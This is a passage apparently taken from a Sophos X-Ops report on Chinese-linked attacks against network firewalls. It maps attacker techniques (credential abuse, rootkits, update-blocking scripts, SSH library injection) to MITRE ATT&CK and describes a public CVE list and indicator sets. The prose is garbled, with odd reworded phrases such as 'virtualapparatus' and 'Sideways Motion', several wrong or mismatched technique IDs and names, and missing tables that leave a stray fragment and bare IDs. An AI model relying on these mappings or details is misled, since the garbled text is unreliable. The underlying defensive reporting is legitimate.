A comprehensive analysis led X-Ops to infer that the malware deployment likely occurred through valid administrative credentials (T1078).
X-Ops also managed to spot a probable attacker-controlled device harboring a copy of the firmware-persistent malware (T1542.001). The virtualapparatus, location-based in Shanghai, displayed frequent software modifications. Interestingly, it was most recently observed operating the same (dated) software version as the affected system.
March 2024: Outdated device Operations
X-Ops obtained information indicating that outdated End of Life (EOL) devices were still exposed to CVE-2022-3236, CVE-2022-1040, and CVE-2020-29574 as active nodes for potential attacks (especially prominent against Ivanti targets). The affected devices were found to be utilizing a Dropbear SSH server on port 58900 and the attackers had deliberately disabled monitoring and remote updates to hinder detection and response efforts.
Sophos X-Ops is open to collaborating with other parties and sharing additional specific indicators of compromise (IOCs) based on individual cases. Reach out to us at pacific_rim@sophos.com
For the complete narrative, please visit our landing page Sophos Pacific Rim: Stand against Chinese Cyber Threats.
Appreciations
Sophos would like to express gratitude for the contributions of ANSSI, Barracuda, Bugcrowd, CERT-In, CISA, Cisco Talos, Digital Shadows (now part of Reliaquest), FBI, Fortinet, JCDC, Mandiant, Microsoft, NCA, NHCTU, NCSC-NL, NCSC-UK, NSA, Palo Alto Networks, Recorded Future, Secureworks and Volexity to this report, or to investigations covered in this report.
Refer to Table 1 through Table 10 for all mentioned threat actor strategies and methods in this report. For guidance on aligning malicious cyber activities with the MITRE ATT&CK framework, check out CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Table 1. Development of Resources
| Approach Title | ID | Utilization |
| Infiltrate Infrastructure: Networking Devices |
T1584.008 |
During analysis within a Sophos trap, investigators noted the culprits had utilized User-Agent strings and payload requests associated with consumer and SOHO routers, along with various requests potentially linked to the Ragnarok ransomware. |
Table 2. Initial Entry
| Approach Title | ID | Utilization |
| Valid Credentials |
T1078 |
The culprits introduced malware through valid administrative accounts. |
| Valid Credentials: Cloud Accounts |
T1078.004 |
The offenders pivoted from on-premises devices to cloud resources by exploiting an IAM configuration associated with AWS SSM. |
| Leverage Vulnerable Public Applications |
T1190 |
The culprits targeted devices with publicly accessible web interfaces. |
| Inadvertent Compromise |
T1189 |
The offenders deployed malicious software designed for MacOS X and iOS, and IFRAME injection code exploiting a vulnerability in WebAssembly (wasm). |
Table 3. Avoidance of Defense Mechanisms
| Approach Title | ID | Utilization |
| Impersonation: Mimic Genuine Title or Location |
T1036.055 |
The offenders swapped out SSH and SSHD with versions affiliated with a malware strain known as Onderon, according to cybersecurity firm ESET. |
| Concealed Information or Files: Digital Padding |
T1027.001 |
The culprits replaced the binaries responsible for verifying the cryptographic signature in the software to evade integrity checks. |
| Stealthy Rootkit |
T1014 |
The offenders implanted a rootkit called Cloud Snooper on a target device, which was utilized to conceal malicious C2 traffic. Additionally, they executed the rootkit libsophos.so. |
| Impersonation |
T1036 |
The culprits renamed a legitimate device file and placed a Remote Access Trojan (RAT) in its stead. They also employed a custom-designed, fully-equipped userland rootkit that closely imitated Sophos product file names and behaviors. |
| Weaken Defenses |
T1562 |
The offenders circumvented the fix for CVE-2022-3236, an exploited vulnerability, by supplying malformed JSON to trigger an exception, bypassing the additional input validation that would have mitigated the vulnerability. |
| Weaken Defenses: Deactivate or Modify Tools |
T1562.001 |
The offenders introduced a script named patch.sh into the system; this script adjusted a setting in a database to disable automatic patch updates, re-executing the command every five minutes. |
| Weaken Defenses: Block Indicators |
T1562.006 |
The perpetrator implemented a script loop that continuously set the administrative setting to reject patches, impairing the victim’s ability to remediate the devices. |
| Weaken Defenses |
T1562 |
The culprits provided malformed JSON to trigger an exception, avoiding the additional input validation aimed at mitigating CVE2022-3236. |
| Indirect Command Execution |
T1202 |
The perpetrators exploited a command injection vulnerability (CVE-2022-3236) in a Perl-based component for initial access to a device. |
| Concealed Information or Files |
T1406 |
The culprits utilized malicious JAR files and connected to a Command and Control (C2) IP on a device that had already received the patch for CVE-2022-3236. |
Table 4. Accessing Credentials
| Approach Name | Identifier | Purpose |
| DCSync Technique: OS Credential Theft |
T1003.006 |
The hackers utilized intercepted credentials to execute a DCSync credential extraction from a domain-controller within the local network. |
| Forceful Entry: Password Estimation |
T1110.001 |
The attackers gained initial entry to multiple affected devices through insecure SSH credentials. |
| Acquire or Fabricate Validation Certificates |
T1649 |
The intruders acquired high-level internal Active Directory credentials with a 64-bit ELF backdoor. |
| Utilization for Accessing Credentials through Exploitation |
T1212 |
The perpetrators exploited CVE-2020-15069 to deploy a program that stole stored credentials on a specific device. |
Chart 5. Exploration
| Approach Name | Identifier | Purpose |
| Network Protocol Discovery |
T1046 |
The culprits executed network scans by using a limited-privilege machine in the victim’s network. |
Chart 6. Sideways Motion
| Approach Name | Identifier | Purpose |
| Utilization of Remote Services for Discovery |
T1210 |
The offenders exploited an authentication-based remote code execution vulnerability in an operating system element. |
| Remote Services: SSH |
T1021.004 |
The attackers used the libsophos.so library to introduce itself into the SSHD system by using the LD_PRELOAD environment variable. |
enabling it to endure firmware updates.
T1205
T1133
T1136.001
T1574.004
T1547
Table 10. Privilege Elevation
| Title of Technique | ID | Utilization |
| Valid Credentials: Cloud Accounts |
T1078.004 |
Misusing an overly permissive IAM configuration associated with AWS SSM to obtain access to cloud resources from on-premises devices. |
Throughout this five-year investigation, analysts closely monitored potentially pertinent research and events, often collaborating with the authors and teams behind the reports. To assist future research endeavors, we have included a selection of research works that facilitated our comprehension of the monitored actors and potentially associated groups and operations.
While crafting our analysis of the events centered around Sophos as detailed in this report, we also observed a surge in network device vulnerabilities being disclosed by various vendors, frequently with subsequent active exploitation. To underscore the extent of global threat activities, and as a possibly beneficial communal asset, we have compiled a roster of publicly documented CVEs impacting network (and other edge) devices provided by a variety of vendors. In scenarios where pertinent public research is available, we have included information on active exploitation and suspected threat actors. This compilation is sourced from publicly accessible channels and diligent searches of publicly available data as of mid-October 2024, as outlined in the table below.
| Data Feature | Source |
| Manufacturer | Manufacturer Website |
| Heading | NIST’s National Vulnerability Database (https://nvd.nist.gov/) |
| CVE | NIST’s National Vulnerability Database (https://nvd.nist.gov/) |
| CVSS | NIST’s National Vulnerability Database (https://nvd.nist.gov/) |
| Publication Date in NVD | NIST’s National Vulnerability Database (https://nvd.nist.gov/) |
| Vendor Advisory Date | Manufacturer Website |
| Usage in ransomware assaults | Publicly Available Data |
| Incorporation Date in KEV Catalog | CISA’s Known Exploited Vulnerabilities Catalog (https://www.cisa.gov/known-exploited-vulnerabilities-catalog). |
| Manufacturer Advisory | Manufacturer Website |
| Exploitation Date Knowledge | Publicly Available Data |
| Threat operative | Publicly Available Data |
| Aims | Publicly Available Data |
Twenty-four vendors are featured in the information. This selection is based on market prevalence and general interest. Inclusion should not be construed as indicative of any relationship to the situations documented elsewhere in the Pacific Rim coverage.
| Arcadyan Technology | F5 | Palo Alto Networks |
| Barracuda Networks | FatPipe Networks | Pulse Secure [Ivanti] |
| Check Point Software | Fortinet | SonicWall |
| Cisco Systems | Juniper Networks | Sophos |
| Citrix Systems | MikroTik | Sumavision Technologies |
| DASAN Networks | Netgear | Tenda |
| D-Link Systems | Netis Systems | TP-Link |
| DrayTek | Oracle | Zyxel |
Sophos encourages contributions or amendments to this compilation and may opt to update it in the future if deemed necessary. The data is stored in a GitHub repository at https://github.com/sophoslabs/NetDeviceCVEs.
A list of compromise indicators can be found on the Sophos X-Ops GitHub for each of the specific attacks delineated in this report:
Note: These lists do not cover all possible IOCs. They concentrate on major, mainly network-related IOCs that defenders are likely equipped to search for. Given the historical nature of much of this activity, the timeframe of any detections should be carefully evaluated and cross-referenced with this report.
About Author
